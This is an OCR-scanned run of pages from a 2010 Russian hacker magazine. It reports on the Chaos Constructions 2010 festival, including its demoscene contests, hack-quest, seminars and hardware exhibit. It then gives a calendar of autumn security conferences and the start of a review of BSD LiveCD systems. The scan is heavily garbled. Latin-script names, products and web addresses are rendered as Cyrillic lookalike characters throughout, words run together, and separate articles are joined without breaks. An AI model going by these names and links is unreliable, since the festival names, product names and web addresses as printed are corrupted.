видом искусства, какдемосцена, тем прочнее 



укреплялись позиции фестиваля. В этом 
смысле будущему СС повезло - в конце 90-х, 
начале 2000-х, демосцена какраз находилась 
в самом расцвете сил, такчто фестиваль по- 
явился очень вовремя, сумел поймать волну 
и сплотил под своим крылом заинтересован- 
ныхлицсо всей страны и ближнего зару- 
бежья. В 1 999 фестиваль был официально 
переименован в СЬаоз Сопзігисііопз и за ним 
окончательно закрепился статус ежегодного. 
Отформата классической демопати СС 
отошел сравнительно недавно -только в 
2006 году. Организаторы, таксказать, уловили 
тренд и заметили, что приходящие на фес- 
тивальлюди интересуются отнюдь нетолько 
демосценой, но и информационной безопас- 
ностью, моддингом, играми, железом во всех 
его проявлениях и множеством других вещей. 
СС изменился, следуя за духом времени - 
появились новые стенды и конкурсы, что 
закономерно привлекло к фесту еще больше 
людей. Это позволило Сбаоз Сопзігисііопз не 
просто «остаться на плаву», но и продолжить 
удерживать позиции одной из крупнейших 
и известнейших демопати (а ныне - просто 
«компьютерного фестиваля») в России. 

Но вернемся к мысли, обозначенной чуть 



выше - почемуже мы назвали СС’ 10 отчасти 
юбилейным? С момента первого ЕІ\ІІ_і6НТ, 
как нетрудно подсчитать, прошло ровно 15 
лет, однако за это время набралась пара лет, 
во время которых фестне проводился. Таким 
образом, этотСЬаоз Сопзігисііопз является 
не 1 5-м, какдолжен был быть, а лишь 13-м 
по счету. С одной стороны - 1 5 лет со времен 
первого ЕІ\ІІ_і6НТ, с другой стороны - пока 
лишь чертова дюжина. 

Здесьже, во вступлении, стоитуделить пару 
слов и самой демосцене. Да, мы вполне 
допускаем мысль, что ты незнаком сэтим 
понятием, и вотпочему: ксожалению, пик 
интереса кдемосцене, пришедшийся на 
начало «нулевых» годов, остался позади, ин- 
терес схлынул. На сегодня пациент, конечно, 
скореежив, чем мертв, однако интересуются 
демосценой весьма узкие круги. 

Итак, что же это такое? По сути, демосцена 
- форма искусства, разумеется, компью- 
терного. Кдемосцене относят и трекерную 
музыку, и многочисленные подвиды интро и 
демо, и АЫ5І- и А5С 1 1 -а рт, и даже пиксельную 
графику. Объектом искусства здесь, чаще 
всего, выступает программа, создаваемая 
демомейкером. Фишка втом, что автору 



► 086 



ХАКЕР 10 /141/ 10 




Общий вид на происходившее 



зачастую нужно воплотить вжизнь некие 
аудиовизуальные образы, при этом поставив 
себя в оченьжесткие рамки - он можетбыть 
ограничен, кпримеру, размером демки или 
производительностью процессора старичка 
2Х5ресІгит, на котором выполняется прога. 
А порой и всем сразу. На выходе получается 
безумный сплав из креатива, программиро- 
вания и хакерства (в исконном понимании 
этого слова). 

В наше время многоядерных процессоров и 
широкополосного интернета, когда мощности 
исчисляются гигабайтами и гигагерцами, 
энтузиастов, готовых колдовать над создани- 
ем 64к Іпіго или 51 2Ь Іпіго, прямо скажем, не- 
много. В некотором роде, пропал стимул. Если 
раньше, когда компы не были столь мощны и 
доступны, у людей возникаложелание ковы- 
ряться и разбираться с ними (хотя бы для того, 
чтобы чертова железка стала работать хоть 
чуточку быстрее!), то сегодня это уже, вроде 
бы, и ни кчему. 

Впрочем, крупнейшее на планете финское 
демопати АззетЫу продолжает ежегодно 
собиратьтысячи энтузиастов со всего мира, а 
это явно свидетельствует о том, что хоронить 
демосцену пока более чем преждевремен- 
но:). 

Компо 

Безумная жара лета 2010 не остановила сотни 
гиков от приезда в Санкт-Петербург и посе- 
щения СІпаоз Сопзігисііопз.тем более что к 
28-29 августа градус уже существенно спал, 
а фестиваль в этом году перебрался в более 
уютное помещение рекламно-выставочного 
комплекса Стачек47. 



Как и в прошлые годы СС был рад предложить 
своим посетителям не только уникальную 
атмосферу и возможность познакомиться и 
пообщаться с интересными людьми, но и кучу 
самых разных конкурсов, как риалтаймовых, 
так и тех, к которым нужно было готовиться 
заранее. 

Хотя СС уже и нельзя назвать чистой демо- 
вечеринкой, краеугольным камнем фестива- 
ля по сей деньявляется именно демосцена, в 
связи с чем ей былоуделено немало внима- 
ния. На СС’10 состоялся уже традиционный 
показ работ, подготовленных и присланных 
участниками заранее (привычные для 
посетителей и конкурсантов СоппЬіпесІ 64к 
Іпіго, СоппЬіпесІ 4к Іпіго, СоппЬіпесІ йето, 
ХХЗресІпит 640к Вето, СоппЬіпесІ Тіпу МРЗ 
Мизіс, ОШзсЬооІТІпу Мизіс и т.д.), также были 
проведены риалтаймовые компо вроде XX 
Зресіпит ОгарЫсз и ХХЗресІпит Сосііпд. 
Победителей конкурсов на СС путем голосо- 
вания определяют сами посетители феста 
(однако в некоторых конкурсах оргкомитет 
все же оставляет решение за собой), так что 
голосованиеза лучшие работы происходило 
прямо на месте, «не отходя от кассы». 

Да не обидятся на нас призеры, но перечис- 
лять здесь их имена и описывать в красках 
каждое их детище мы не станем. Графические 
работы вообще довольно проблематично 
облечь в слова - их просто нужно видеть, 
равно как музыкальные работы - слышать. В 
противном случае может получиться как в том 
анекдоте: «Мне Рабинович напел». Приоб- 
щиться к прекрасному лично традиционно 
можно и нужно на сайте фестиваля - Ьир:// 
рагіуі О.сс.огд.ги. На РТР и НТТР СС’1 Оуже 



залили большую часть конкурсныхтворений. 
В целом, если сравнивать с предыдущим 
годом, в конкурсной программе СЬаоз 
Сопзігисііопз 2010 различных компо стало 
больше почти на десяток (в общей сложности 
- более 40). В частности, увеличилось число 
конкурсов, проходящих непосредственно на 
фестивале, предварительной подготовки для 
которых нетребовалось. Найти состязание 
себе по душе, пожалуй, смог каждый посе- 
титель, и не важно, участвовал он в нем или 
просто наблюдал и болел. 

Говоря о приросте количества риалтаймовых 
конкурсов, нельзя не сказать и о некоторых 
изменениях в правилах их проведения. Все 
предыдущие годы на СС для проходящих пря- 
мо на фестивале компо выделялись специ- 
альные машины, на которых был установлен 
одинаковый софте одинаковыми плагинами 
и мульками, чтоуравнивалоучастников 
состязаний в шансах. Упросить организато- 
ров, например, «пустить порисовать на своем 
ноутбуке» было практически невозможно, 
и, в общем-то, это было верным решением: 
домашние заготовки могут стать серьезным 
читом в конкурсахтипа Реаі-бте ОгарЫсз 
или РеаИіте Мизіс. В этом году, однако, 
машин для риалтаймовых конкурсов не было, 
участникам предлагалось работать на своих 
собственных ноутбуках (какэто вы не при- 
несли с собой ноутбук?!). Увы, такая ситуация 
сложилась по причине некоторой дискоорди- 
нации в организаторском составе фестиваля 
и весьма скромного бюджета. Впрочем, в 
этом году вообще до последнего момента 
сохранялась вероятность, что фестиваль не 
состоится. Справедливости ради напомним, 
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ссылки на видеозаписи, так что если какие-то 
из семинаровтебя заинтересуют- можно 
посмотреть и послушать. 

Что до интересных железок - в этом году экс- 
позиция была скромнее, нежели в прошлом, 
но все же, чего там только не было! Каждый 
год «железная» часть фестиваля интересна 
по-своему, ведь формируется она энтузиаста- 
ми, предоставляющими интересные машины 
из собственныхзакромов, в силу чего техника 
на СС год от года разная. Железо было пред- 
ставлено как «россы пью» - в виде отдельных 
плати микросхем, таки в виде древних, но 
работающих машин, за которыми можно было 
посидеть, почувствовав дух того времени. 
Экспозициютехники на СС можно изучать ча- 
сами, общаясьсхозяевами экспонатов, читая 
сопроводительныетаблички и приобщаясь 
колдскулу, или, напротив, к нестандартным 
модерновым решениям. Гдеещеты найдешь 
в одном месте работающую ВВ5, сможешь 
поработать в МЗХ-йОЗ, МЗ-йОЗ или МасОЗ, 
и собственными руками пощупаешь Аіагі 
ХЕ Сате Зузіет или Атіда 600? Прибавим 
к этому еще и интересные самодельные де- 
вайсы вроде щкпі (устройство для отслежи- 
вания движений головы) или оригинального 
электронного календаря, и получим неподра- 
жаемую картину. Такое действительно нужно 
видеть и, конечноже, щупать! 

Еще одним интересным новшеством, на 
которое организаторами в этом году было 
потрачено море сил и времени, стало он- 
лайновое вещание всего происходящего на 
СЬаоБ Сопзігисііопз в Сеть. Да-да, все, каку 
взрослых, настоящая интернет-трансляция 
- операторы с камерами, куча аппаратуры и 
возможность наблюдать за фестом в режиме 
онлайн. И интересен нетолько сам факт 
трансляции, но ито, какона была реализо- 
вана. Об этом подробно, в деталях рассказал 
в своем блоге один из столпов фестиваля, 
Еазу^Ьп. Найти его рассказ можно по адресу 
ЬирУ/еазѵрЬп.ІіѵещигпаІ.сопп/1 641 92.Ы:т[ . 
Да, первый блин, возможно, вышел немно- 
го комом, были определенные недочеты и 
трудности, но, читая рассказ Еазу^Ьп’а, 



что СЬаоБ СопБІгисІіопз- мероприятие 
некоммерческое, спонсоры и та к дела ют 
очень многое, так что здесь сложно кого-то 
винить, тем более, что орги сами признают 
свои ошибки и вовсе им не рады. Какбыто 
ни было, в основном публика действитель- 
но приходила на СС со своими ноутбуками, 
планшетами, фотоаппаратами и т.д., такчто 
особого дискомфорта изменения в правилах 
ни у кого не вызвали. Логично сочеталось 
это нововведение и с еще одним новшест- 
вом - ряд конкурсов был доступен не только 
посетителям фестиваля, но и людям, наблю- 
давшим за СС’1 0 онлайн. Как ты понимаешь, 
проконтролировать последних и вовсе не 
было никакой возможности, такчто в итоге 
все оказались примерно равны и довольны, 
гровая зона, еще в прошлом году доказав- 
шая, что интерес к ней есть и немалый, в этот 
раз существенно расширилась и обзавелась 
собственной конкурсной программой. Гейме- 
ров -олдскулыщи ко в порадовали проведени- 
ем чемпионата по Могіаі СотЬаІ, плюс жела- 
ющие могли попробовать поставить рекорд в 
легендарных «Танках» (ВаЛІе Сііу) на Оепсіу. 
Современные игрытоже не были обделены 
вниманием - можно было померяться силами 
в ЗіагсгаЛ 2, поучаствовать в музыкальной 
битве Оиііаг Него 5 на большом экране, или 
понаблюдать за командным чемпионатом 
Оиаке 3 СТЕ. Электронщикам был предло- 
жен целый спектр конкурсов, от баловства 
типа сборки компьютера на время (лучший 
результат первого дня, кстати, составил 
целых 7 минут34 секунды!) или обжимки 
кабеля Еібегпеі на скорость, до загадочных 
компо вроде «Радиомонтажного АРТ’а»- 
конкурса на самую оригинальную инстал- 
ляцию из радиодеталей. Хак-зона тоже 
цвела и пахла, равно как и зона игровая, но о 
ежегодной зубодробильной забаве по имени 
Наск-Оиезітебе развернуто расскажет на 
соседнихстраницах][сам ее организатор (и, 
по его собственному признанию, «крестная 
мать«Хак-квеста») -Тоха. Мы же заметим, 
что было как всегда круто, и с заданием не 
справился никто :). 

Казуалы, которые год за годом упорно про- 
должают приходить на фестиваль (интерес- 
но, что они там ищут?), могли развлечь себя 



участием в компо, нетребующих никакой 
специальной подготовки и особыхталантов. 
Ктаким видам развлечений можно отнести, 
к примеру, уже ставшиетрадицией Киберго- 
родки, Метание ЕЮО и Реаі-бте РЬоІо. 

Вне конкурса 

Помимо живого общения и состязаний всех 
мастей СС, это также интересные семинары, 
стенды и, конечно, уже ставшая отличитель- 
ной особенностью ивента выставка раритет- 
ного, исторического и необычного железа. 
Семинаров в этом году в программе СС 
было столько (16 штук), что, по признанию 
организаторов, если бы два из них случайно 
не отменились за день до фестиваля, то все 
они попросту не уместились бы в расписании, 
и часть выступлений проходила бы ночью :). 
Этот год в частности порадовал хорошими 
докладами из области информационной 
безопасности, которые, в общем-то, было 
бы не стыдно представить и на маститых 
западных мероприятиях. Но обсуждали на 
СЬаоБ СопБІгисбопБ 2010, конечно, нетолько 
ИБ, а самые разные вещи: отуязвимостей 
в 50РЕ и нового направления ореп зоигсе 
разработок, Ореп Зоигсе Нагбѵѵаге, до азов 
проектирования и составления алгоритмов 
работы роботов. Полный список презентаций 
можно найти по адресу ЬирУ/рагІѵІ О.сс.огд. 
ги/зеттагрб , на этой же странице есть 

Кучка старых процов 
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Орги Хакзоны: за несколько часов до старта 
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проникаешься огромным уважением к людям, 
которые способны своими силами менее чем 
за месяц и фактически с нуля организовать 
такое, имея на руках весьма скромную сумму 
денег. Речь, конечно, нетолько отрансляции, 
но и обо всем фестивале в целом. Респект 
вам, Александр Калмыков (ЗуМ), Всево- 
лод Потапов (гапбот), Евгений Барбашин 
(оШауп) и другие члены оргкомитета, вы год от 
года делаете огромное дело и не устаете нас 
радовать! Кстати, ремастер-версия отснятого 
на фестивале материала уже лежит в Сети, 
такчто«побывать на СС» можно и задним 
числом, для этого достаточно перейти по 
ссыл ке ЫТрѴ/рагМ О.сс.огд.ги/опііпе.рбр . 
Практически все ключевые события ивента 
там запечатлены. 

ХАКЗОНА НА СС 2010 

Особое место на фестивале вот уже 
который год отводится секции «Хакзона» 
и конкурсу «Хак-квест», проходящему в ее 
рамках. Конкурс, вместе с секцией докла- 
дов по информационной безопасности, вот 
уже который год подряд привлекает вни- 
мание такого количества посетителей, что 
впору делать небольшой экскурс в историю 
и вспомнить, как же все начиналось. 

Прошлое 

А началось все в 2006 году, когда некоторые 
из организаторов СС решили, что неплохо бы 
разбавить демо-составляющую фестиваля 
«хакерской»тематикой. А что: демосце- 
на - направление весьма специфичное, а 
разного народу на демопати приходит много. 
Признаюсь, я и сам тоже, посещая фестивали 
в предыдущие годы, не раз ловил себя на 
мысли, что «демки - это, конечно, круто, но 
вот бы что-нибудь по нашей тематике...». 

Да и вообще, на западе - Бекоп, Віаскбаі:, 
масса других крутых тусовок по безопаснос- 
ти, а у нас что? 

Сказано - сделано, и на СС’ 2006 впервые 
появилась секция «Сети и хак». В ее рамках 
были прочитаны несколько докладов по 
информационной безопасности и проведен 
конкурс «Хак-квест» в его первой инкарна- 
ции. Это был линейный перечень заданий 
вроде «взломать СМ5» и «проникнуть в бес- 
проводную сеть», по результатам выполне- 
ния каждого задания участник получал некое 
кодовое слово, которое затем должен был 
ввести в специальный веб-движок. Секция 



имела большой успех и стало понятно, что 
Хакзоне на СС - быть! 

В следующем, 2007 году успех был развит на 
площадке игровой выставки НІТ в питерском 
Манеже. Организаторы получили возмож- 
ность провести отдельное мероприятие 
(оно было названо «СЬаоз Сопзіхисбопз 
НаскАгоипб») вне рамок СС и получилась 
насыщенная двухдневная тусока, наверное, 
ближе всего подобравшаяся по духу и напол- 
нению кзнаменитомуДефкону. Тогда же на 
фестивале поя вилась теп ерь уже знаменитая 
«стена позора»: так как на патиплейс всегда 
присутствует отрытый вайфай для участни- 
ков и гостей, многие забывают о том, где они 
находятся и пренебрегаютэлементарными 
мерами безопасности. В показательно- 
воспитательных целях все пароли перехва- 
тываются и демонстрируются на большом 
экране в виде «звездочек» вместе с логином 
«провинившегося». Тем самым «стена» де- 
монстрировала посетителям, что, в отличие 
от нас, на фестивале вполне могут присутс- 
твовать люди, которые относятся к чужим 
перехваченным паролям с гораздо большим 
пристрастием. 

Следующий, 2008 год был переломным для 
«Хак-зоны». Вся команда основных органи- 
заторов полным составом решила выйти из 
игры и поднимать упавшее знамя пришлось 
нам вместе с другими организаторами СС. 
Сворачивать направление не было никакого 
смысла, так как народ уже явнотребовал хле- 
ба и зрелищ, да и нам было интересно :]. Но 
нет худа без добра: я решил воспользоваться 
моментом и полностью изменить концепцию 
Хак-квеста, взяв на себя дополнительную 
ответственность и даже столкнувшись с 
некоторым непониманием других оргов. 

Было решено переработать подачу конкур- 
са, оставив основную идею выполнения 
заданий, нахождения ключевых слов и 
вписывания их в движок Ха к- квеста. Однако 
вместо линейныхзаданий была предложена 
абсолютно нелинейная структура в виде 
«черного ящика»: участнику предоставля- 
лось подключение в конкурсную сеть класса 
С и более ничего! Все системы, уязвимые 
сервисы и связи между ними он должен был 
найти сам. Болеетого, даже движок конкурса 
был более недоступен по известному адресу: 
участникам предлагалось самим найти его, 
понять протокол общения и только тогда 
они могли вводить найденные ключи. Те, 



кто когда-либо проводил ЫаскЬох-тесты на 
проникновение, поймут, насколько это инте- 
ресная иживая схема:ты сканируешь сеть, 
находишь хосты, отделяешьзерна от плевел, 
пробуешь разные сервисы на наличиеуяз- 
вимостей и, погружаясь все больше и больше 
в пучину взломанных систем, находишь 
ключевые слова. Идея состояла также в том, 
чтобы на уровне сети хак-квеста совместить 
какможно больше разнообразныхзада- 
н и й : от атак второго уровня иуязвимостей в 
сетевых демонах до ошибок в конфигурации 
операционных систем и узвимостей в веб- 
приложениях. 

Итак, в 2008 году Хак-квест и Хакзона получи- 
ли второе рождение. Рисковая ставка сыгра- 
ла: участникам и посетителям новая модель 
пришлась по душе куда больше предыдущей, 
мы получили массу положительных отзывов. 
Стало понятно, что в следующем году надо 
развивать найденное направление. 

И мы развили :). В команду организаторов 
конкурса влилисьлюди, расширившие 
и улучшившие различные направления 
конкурсных заданий (здесь, в первую 
очередь, стоитсказать о компании Розіііѵе 
Тесбпоіодіез, чьи парни как никто другой 
умеют совмещать работу и удовольствие]. 

Был проведен отдельных конкурс на обход 
ѴѴАР от компани «Битрикс» с призами от них 
же. На СС '2009 Хакзона и Хак-квест окон- 
чательно оформились втом виде, в котором 
мы знаем их сейчас и стали существенной 
частью всего фестиваля СЬаоз Сопзігисііопз. 

Настоящее 

В этом году Хак-квест был подготовлен 
широким костяком организаторов, что в 
очередной раз повысило его сложность и 
интерес :). Кроме этого, было прочитано 
немало интересных докладов по И Б - по- 
ловина всех семинаров и выступлений в 
рамках СС ’ 20 1 0 была на тему информаци- 
онной безопасности! Причем, как и раньше, 
мы внимательно заботимся отом, чтобы 
выступления затрагивали актуальные, инте- 
ресные технические темы, так как марке- 
тинговый бизнес-буллшит можно послушать 
и на других выставках. Так, в этом году 
исследователи из различных ИБ-компаний 
представили на фестивале новые, еще ниг- 
де не публиковавшиеся материалы. 

Конкурс оказался настолько интересен 
и сложен для участников, что мы решили 
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СЦЕНА 




монохромными дисплеями 



о публиковать ту его часть, которую мож- 
но «организовать» через интернет, на 
площадке журнала и предоставить всем 
желающим доступ для участия онлайн. 
Следи за анонсами! 

Будущее 




Организаторы открывают СС 




Не умаляя достоинств других (в том числе 
и главной) секций СЬаоз Сопзігисііопз, 
скажу: Хакзона стала самостоятельной, 
весомой частью фестиваля. Большая часть 
народа идет именно «на Хакзону», чтобы 
посмотреть, послушать, поучаствовать. Это 
единственное мероприятие подобной фор- 
мации на территории бывшего СНГ. И мне, 
как идейному вдохновителю мероприятия в 
его ныншенем виде, это особенно приятно. 
Но за организацией Хакзоны стоит не один, 
не два и нетри человека. Это команда 
людей, профессионалов ИБ из консалтин- 
говых и ИТ-компаний, системных админис- 
траторов... Все вносятсвой существенный 
вклад, без которого секция не получилась 
бы такой, какая она есть. Но главное - это 
ты, дорогой читатель, участвующий в Хак- 
квесте, слушающий семинары, интере- 
сующийся хакерством в его первородном 
смысле. Ты был на СС и хочешь поделиться 
своим мнением? А может быть, у тебя есть 
соображения отом, какеще в будущем 
должна выглядеть Хак-зона? Пиши мне на. 
ІохаШохаЬозГги . буду рад. 

Все, что осталось за рамками данной 
статьи о Хак-зоне, можно послушать в 
сети. Александр Матросов из компании 



Робот со стенда «Мега-Электроники» 

Е5ЕТ записал весьма интересный под- 
каст с организаторами Хак-квеста (мной и 
Дмитрием Евтеевым), который ты можешь 
послушать на ЬирУАл/ѵѵѵѵ.езеІпосШ.гиЛ 
сотрапѵ/росісазі/ . 



КАЛЕНДАРЬ 

После прочтения отчетов об интересных 
ивентах всегда хочется сорваться с места 
и немедленно бежать, ехать, лететь на бли- 
жайшее похожее мероприятие. Увы, многие 
громкие события вроде ВІаскНаІ, АззеЫу, 
Наскегз оп Ріапеі ЕагіЬ, БЕРССИМ и т.д. прохо- 
дят летом, так что в их отношении поезд уже 
ушел. Однако желание посетить интерес- 
ный ивентвидится нам не самым плохим и 
бесполезным, поэтому для твоего удобства 
мы приводим календарь наиболее ярких 
и крупных ивентов на осень-зиму 201 0. В 
холодное время года жизнь ІТ-сцены отнюдь 
незамерзает. 

Наск Іп ТЬе Вох 

Когда: 13-14 октября 

Где: Куала-Лумпур, Малайзия 

Сайт: НИр://ѵѵщѵѵ.ЬаскіпИіеЬох.огд/ 

Мы частенько упоминаем НІТВ на страницах 
][, например, в прошлом номере Александр 
Поляков делился с тобой своими впечатле- 
ниями и рассказывал отом, что происходило 
этим летом на Наск Іп ТЬе Вох в Амстердаме. 




Уже ставшая традиционной «Стена позора» фестиваля 
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«Режиссерское кресло», откуда 
происходило управление видео- 
трансляциями на СС 



Но НІТВ - мероприятие крупное, и зачастую конфа проводится не один 
раз в год. 2010 год исключением не стал - помимо европейского летне- 
го «хака в коробке» будет и осенний, который традиционно пройдет в 
Малайзии (НІТВ - все же крупнейшая в Азии конференция). Начнется 
все стренингов, которые состоятся в начале октября, а продолжит- 
ся самой конференцией и полноценным хак-фестивалем в лучших 
олдскульныхтрадициях. Среди спикеров значатся Денис Маслеников 
(Казрегзу І_аЬ), Микко Хиппонен (І5С), Пол Викси (І5С) и другие светила 
ІТ-безопасности. 

5есТог 

Когда: 26-27 октября 
Где: Торонто, Канада 
Сайт: Ы1р://щщщ,$ес1ог.са 

По ту сторону океана тоже естьжизнь, и есть ІТ-сцена, которой нужно 
где-то собираться. Канадский ЗесТог- конференция ежегодная, с 
хорошим «послужным списком». Сайтивента каждый год радует объ- 
явлением, что на мероприятии будут рады видеть нетолько именитых 
деятелей (которые ЗесТог с радостью посещают), но и прочих «темных 
гениев» компьютерных искусств. В виду географического положения 
конфа в основном привлекаетспикеров из СШАи Канады, хотя евро- 
пейские гости здесь не редкость. Краеугольный камень мероприятия 
- информационная безопасность. 

йеерЗес 

Когда: 23-26 ноября 
Где: Вена, Австрия 
Сайт: Ьйрз://сІеер5ес.пеТ 

Еще одна европейская конференция, каждый год собирающаяся, что- 
бы обсудить различные аспекты ІТ-безопасности. йеерЗес объединя- 
ет под своим крылом и представителей правительстве иных структур, и 
ученых, и ведущих мировыхспециалистов, и хакерский андеграунд. В 
этом году среди спикеров будут представители МсАІюе, Іпіеі, ведущих 
университетов Европы и многие другие. Не обойдется и безучастия 
наших соотечественников, Александра Полякова (ОідіІаІЗесигіІу) и 
Макса Гончарова (ТРЕІ\Ю МІСРО Іпс). Доклады планируются самые 
разные, отобщих презентаций, например, о будущем социального 
инжиниринга, до конкретных вещей, вроде проблем с безопасностью 
в клиентских приложениях системы ЗАР. 

ОгеашНаск 

Когда: 25-28 ноября 
Где: Йенчепинг, Швеция. 

Сайт: Ы1р://щщщ,с1геатИаск.зе 

Одна из крупнейшихлан-пати не только по эту сторону океана, но и на 
всем нашем голубом шарике. Зародился ивентв начале 90-х, и начи- 
налосьвсеоченьскромно- группа ребятначала собираться в подвале 
родной школы, развлекая себя и друзей красотами демосцены. Через 
пару лет пати переросла школьный подвал и вышла на свет, став 
одним из крупнейших в Европе мероприятийтакого рода. На сегодня 
ОгеатНаск, каки наш Сбаоз Сопсігасбопз, отошел отформата чистой 



демопати, развившисьв полноценный компьютерный фестивальс 
игровыми, хакерскими, «железными» и сценерскими конкурсами, 
выставкой и кучей всего. В 2007 году фестустановил мировой рекорд 
и был занесен в Книгу рекордов Гиннеса: 1 0.554 компьютеров и 1 1 .060 
посетителей почтили его своим присутствием. Какты понимаешь, 
такое количество людей вряд ли ежегодно ездит в Швецию просто так, 
ОгеатНаскдействительно потрясающе разнообразен, интересен и на 
него ориентируются десятки более мелких лан-пати по всему миру. 

НаскРезІ 

Когда: 5-6 ноября 

Где: Квебек, Канада 

Сайт: ІіПр://цлллу.УіаскТе5іса 

Если читая о ЗесТог, ты подумал, что в Канаде проводятся только 
серьезные, официальные мероприятия, можемтебя заверить, что это 
нетак, и небольшой НаскГезі- яркий тому пример. Ивентпроходит 
ежегодно и носитпостоянный статус двуязычного - основные языки 
конференции английский и французский. Здесь разговариваютоб 
информационной безопасности, читают до клады, проводят (плат- 
ные)тренинги и устраиваютхакерские конкурсы от самых простыхдо 
зубодробильных. НаскЕезІ рассчитан на широкую аудиторию, так что 
здесь будет интересно и хардкорному хакеру, и студенту, и признанно- 
му специалисту. 

СНаоз Соттипісагіоп Сопдгезз 

Когда: 27-30 декабря 
Где: Берлин, Германия 

Сайт: НПр://ѵѵѵуѵу.ссс.сІе 

Очень старая, проверенная временем конференция, которую проводят 
ажс 1984 года. В роли родителей мероприятия, как не трудно догадать- 
ся, выступает известное германское хак-комьюнити Сбаоз Сотриіег 
СІиЬ. Ежегодно ивент собирает несколько тысяч человек со всей 
планеты, среди которых присутствуют и представители хак-сцены 
всех«цветов», и разработчики ПО, и спецы по безопасности, и другие 
интересные кадры. Программа еще уточняется, ноуже сейчас можно 
суверенностью сказать, что неинтересно на ССС быть просто не может. 

Ьапѵѵаг 

Когда: январь 2011 
Где: Луисвиль, США 

Сайт: Ыф://ѵѵѵѵщ.Іапѵѵаг.сот 

Одна из крупнейшихлан-пати натерритории США, проводится уже 
больше 1 0 лет (с 1 998 года). Уверенно держит марку ежегодного съезда 
профессиональных геймеров всея Америки. Да, Еапѵѵаг- мероприя- 
тие больше геймерское, нежели хакерское, но погоди презрительно 
кривиться. Ты хоть раз был на огромном слете геймеров? Поверь, это 
отнюдь не скучно и мало похоже на унылые мероприятиятипа нашего 
«Игромира». Атмосфера веселого безумия, огромное количество кон- 
курсов (втом числе и просто «бог би п»), море людей, красочные муль- 
тимедийные шоу и многое, многое другое. Словом, если представится 
возможность заглянуть на Еапѵѵаг, пренебрегать ею явно не стоит, тг 
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Изучаем ЫѵеСО и десктопные варианты 
В50-систем 

Даже у ветерана І_іпих установка и использование В50-системы может 
вызвать множество вопросов. Несмотря на кажущееся сходство, у этих 
систем много различий, а правильно установленная ОС зачастую требует 
немалой доработки напильником. Это отпугивает новичков, однако 
те, кто хочет просто взглянуть на В5й без вникания в подробности ее 
работы, могут попробовать специальные ЫѵеСО и десктопные варианты 
этих систем. 



В ОТЛИЧИЕ ОТ МИРА ІЛМІІХ, ГДЕ ЕЖЕДНЕВ- 
НОЕ ПОЯВЛЕНИЕ НОВОГО ДИСТРИБУТИВА 
УЖЕ ДАВНО СТАЛО НОРМОЙ, а общее число 
различных редакций операционной системы 
перевалило за десятки тысяч, количество 
ВВО-систем можно пересчитать буквально 
по пальцам. Существует несколько форков 
когда-то вышедшей из стен Беркли ориги- 
нальной В5Б, которые по праву считаются со- 
вершенно разными и в большинстве случаев 
несовместимыми между собой операционны- 
ми системами. Имя им — РгееВВО, ЫеШВО, 
ОрепВВО и, какбы странноэто низвучало, 
йгадопРІу ВВО. Каждая из них представляет 
собой полноценную ОС, занимаетопреде- 
ленную нишу и разрабатывается независи- 
мой командой энтузиастов. До недавнего 
времени на этом разнообразие вселенной 
ВВО и заканчивалось, однако времена меня- 
ются, и ВВО-системы все больше становятся 
похожи на операционки общего назначения, 
которые могут при менять для повседневного 
использования и те, кто с ними совершенно 
незнаком. Время отвремени на светпоявля- 
ются различные редакции В80, призванные 
упростить процесс вливания новых пользо- 
вателей. 



Самый простой путь «показать народным 
массам ВВО»заключается в распростране- 
нии ЫѵеСО. В свое время было разработано 
несколько редакций ВВО-систем, выполнен- 
ных в этом формате. Наиболее известным их 
представителем стал Ргепгуі основанный на 
РгееВВО (хотя, как будет сказано ниже, цель 
его разработки была совсем иная). Вслед за 
ним были созданы ЫіЬЬесІ и ВВОАпуѵѵбеге, 
аналогичные системы на базе ЫеіВВО и 
ОрепВВО. Также почти в одно время (с разни- 
цей втри месяца) независимыми командами 
были созданы десктопные редакции РгееВВО 
под названием РС-ВВО и ОезкІорВВО, кото- 
рые хоть и не позволяли загружать ОС прямо 
с диска, но были укомплектованы простыми в 
использовании графическими инсталлятора- 
ми и утилитами для настройки и сопровожде- 
ния системы. 

Инструмент, 
сисадмина Ргепгу 

Домашняя страница: ігепгу.огд.иа 
({гепгу.Ьзри.ги) 

Последний релиз: 1.3 (26 июля 2010) 
Операционная система: РгееВБй 8.1 

В отличие от всех остальных систем, опи- 



санных в данном обзоре, смысл разработки 
Ргепгу состоял вовсе не в том, чтобы показать 
новичкам все чудеса мира ВВО, Сергей 
Можайский (кслову, один из авторов ][) делал 
ЫѵеСО для себя и всего лишь хотел иметь 
инструмент системного администратора 
всегда под рукой. Однако то, во что вырос этот 
инструмент спустя годы, вполне можно на- 
звать системой для быстрого ознакомления 
с РгееВВО. Ргепгу содержит не только все не- 
обходимые программы сисадмина, включая 
различные снифферы, порт-сканеры, утилиты 
мониторинга, но и стандартный набор про- 
грамм повседневного использования, среди 
которых есть РігеЫх, Орега, СЬготе, ХММВ, 
МРІауег, Рзі, БуІрЬеесІ. 

Загрузка Ргепгу занимает совсем немного 
времени, нодва раза на своем пути она будет 
прервана на 5 и 1 5 секунд. В первом случае это 
будет меню загрузчика РгееВВО, используя 
которое, можно отключить АС РІ, загрузиться в 
однопользовательском режиме и произвести 
любые другие настройки ядра. Во втором на 
экран будет выведено уже собственное меню 
Ргепгуі с помощью которого можно изменить 
некоторые параметры загрузки системы, 
включая возможность выбора языка интер- 
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ІсеѴѴЛЛ ихіев ВЗОАпуѵѵЬеге 



ІЭезкіорВЗО: перед установкой узнаем 
конфигурацию компа 



фейса, загрузки всей ОС в память (что сделает ее гораздо 
более быстрой), отмены монтирования жесткого диска 
и т.д. Через несколько секунд после этого система будет 
полностью готова к работе, на экране появится стандарт- 
ное приглашение командной строки. 

После ввода команды зіагіх произойдетзапускХ-сервера 
с оконным менеджером РІихЬох, монитором Сопку внизу 
рабочего стола, программой для размещения иконок 
на рабочем столе ісіезк и переключателем раскладки 
клавиатуры ххкЬ (ее иконку можно увидеть в трее). Стоит 
сказать, что запускается и работает все это очень быстро, 
а выглядитстильно. Какого-либо конфигурирования 
иксов не требуется, разрешение экрана выбирается как 
раз под монитор. Звук работает из коробки, сеть придется 
настраивать руками, но эта операция не должна вызвать 
проблем, так как правильный драйвер уже активирован. 
Совместимость с каким-либо нестандартным оборудова- 
нием не предусмотрена, поэтому если обычная ЕгееВЗО 
умеет его подхватывать, должна и Ргепгу, иначе — возня с 
консолью и танцы с бубном. 

Как и в стандартном РІихЬох, правая кнопка мыши откры- 
ваетменю, наполненное огромным количеством софта на 
все случаи жизни. Приведу лишь краткий списоктого, что 
есть на диске: 

